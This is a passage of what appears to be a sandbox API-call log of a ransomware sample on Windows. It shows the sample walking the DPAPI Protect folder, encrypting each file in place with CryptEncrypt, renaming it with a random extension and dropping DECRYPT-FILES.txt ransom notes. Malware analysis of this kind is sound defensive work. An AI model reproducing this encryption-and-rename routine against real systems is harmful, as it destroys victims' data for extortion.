cAlternateFileName="")) returned 1 [0088.020] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\" [0088.020] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="CREDHIST" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" [0088.020] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.021] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0088.022] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=24) returned 1 [0088.022] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0088.022] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.022] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.022] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.022] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.024] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0088.024] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.024] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.025] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.025] CloseHandle (hObject=0x444) returned 1 [0088.025] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.025] WriteFile (in: hFile=0x440, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0088.026] CloseHandle (hObject=0x0) returned 0 [0088.026] CloseHandle (hObject=0x440) returned 1 [0088.026] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.026] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.026] GetTickCount () returned 0x114e724 [0088.026] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.027] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.027] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.027] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.028] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.028] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 59 [0088.028] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.UgmTZ") returned 65 [0088.028] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.UgmTZ" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist.ugmtz"), dwFlags=0x0) returned 1 [0088.028] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.029] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.029] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.029] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a8d820, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a8d820, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a8d820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.029] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\" [0088.029] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\jkbimi8.tmp" [0088.029] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.029] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.030] CloseHandle (hObject=0x0) returned 0 [0088.030] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.030] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0088.030] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2=".") returned 1 [0088.030] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="..") returned 1 [0088.030] lstrcatW (in: lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="\\" | out: lpString1="S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="S-1-5-21-3111613574-2524581245-2586426736-500\\" [0088.030] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0088.030] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Program Files") returned 0x0 [0088.030] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch=":\\Windows") returned 0x0 [0088.030] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Games\\") returned 0x0 [0088.030] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Tor Browser\\") returned 0x0 [0088.030] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\ProgramData\\") returned 0x0 [0088.030] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0088.030] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\jkbimi8.tmp") returned 109 [0088.030] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.033] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 97 [0088.033] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.033] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\DECRYPT-FILES.txt") returned 115 [0088.033] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.033] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.034] CloseHandle (hObject=0x444) returned 1 [0088.034] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 97 [0088.034] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*" [0088.034] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ab3980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ab3980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.034] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.034] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ab3980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ab3980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.034] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.034] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.034] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2b9bd87, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cAlternateFileName="BE5B4F~1")) returned 1 [0088.034] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0088.034] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" [0088.034] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.035] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.035] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=468) returned 1 [0088.036] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0088.036] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.036] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.036] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.036] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.036] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0088.037] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.037] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.037] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.037] CloseHandle (hObject=0x44c) returned 1 [0088.038] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.038] WriteFile (in: hFile=0x448, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0088.038] CloseHandle (hObject=0x0) returned 0 [0088.039] CloseHandle (hObject=0x448) returned 1 [0088.039] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.039] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.039] GetTickCount () returned 0x114e734 [0088.039] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.039] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.039] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.040] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.040] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.040] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 133 [0088.040] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr") returned 139 [0088.040] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduzr"), dwFlags=0x0) returned 1 [0088.041] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.041] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.041] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.041] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0ab3980, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ab3980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ab3980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.041] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0088.042] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\jkbimi8.tmp" [0088.042] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.042] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.042] CloseHandle (hObject=0x0) returned 0 [0088.042] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.042] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0088.042] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0088.042] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="Preferred" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" [0088.042] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.043] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.043] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=24) returned 1 [0088.043] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0088.043] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.043] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.043] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.043] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.048] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0088.048] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.049] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.049] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.049] CloseHandle (hObject=0x44c) returned 1 [0088.049] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.049] WriteFile (in: hFile=0x448, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0088.050] CloseHandle (hObject=0x0) returned 0 [0088.050] CloseHandle (hObject=0x448) returned 1 [0088.050] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.050] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.051] GetTickCount () returned 0x114e744 [0088.051] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.051] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.051] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.051] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.052] lstrcpyW (in: 